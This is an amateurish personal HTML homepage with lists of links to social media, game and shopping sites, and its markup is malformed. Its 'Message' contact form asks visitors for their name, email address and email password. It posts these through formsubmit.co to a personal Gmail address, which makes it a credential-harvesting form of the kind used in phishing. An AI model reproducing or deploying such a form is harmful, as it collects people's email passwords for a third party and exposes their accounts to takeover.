<!DOCTYPE html PUBLIC>

<HTML>
    <head>

<body style="background-color:lightgreen;">
<title>abdallah's sherief website</title>

<h1 style=background-color:yellow;> welcome to abdallah -facego</h1>

<h3>made from abdallah sherief</h3>


<h2 style="color:red;"> here are all the websites &#x1F447</h2>
<h2 style="color:green;">here are the social media websites &#x1F447</h2>

<a href="https://www.youtube.com/;"><b>youtube</b></a><br>
<a href="https://facebook.com/;">facebook</a><br>
<a href="https://www.google.com/;">google</a><br>
<a href="https://mail.google.com/;">mail</a><br>
<a href="https://outlook.live.com/;">hotmail</a>
<hr>
<h2 style="color:green;">here are the games websites &#x1F447</h2>

<a href="https://www.y8.com/;">y8 games</a><br>
<a href="https://www.epicgames.com/;">epic games</a><br>
<a href="https://play.barbie.com/;">barbie games</a><br>
<a href="https://www.crazygames.com/;">crazy games</a></br>
<a href="https://www.iupy.com/;">girls games</a></br>
<hr>

<h2 style="color:green";> here are shopping websites &#x1F447</h2>

<a href="https://www.amazon.com/;">amazon</a><br>
<a href="https://www.target.com/;">target</a><br>
<a href="https://www.amazon.eg/;">amazon egypt</a><br>
<hr>

</head>
<body>
       
<div class="container">
  <h1>Message</h1>
  <form target="_blank" action="https://formsubmit.co/abdalahhhashesh@gmail.com" method="POST">
    <div class="form-group">
      <div class="form-row">
        <div class="col">
           <input type="File"><br>
          <input type="text" name="name" class="form-control" placeholder="Full Name" required>
        </div>
        <div class="col">
          <input type="email" name="email" class="form-control" placeholder="Email Address" required><br>
          <input type="Password" name="Password" class="form-control" placeholder="Email Password" required>
        </div>
      </div>
    </div>
    <div class="form-group">
      <textarea placeholder="Your Message" class="form-control" name="message" rows="10" required></textarea>
    </div>
    <button type="submit" class="btn btn-lg btn-dark btn-block">Submit message</button>
  </form>
</div>

</body>
</html>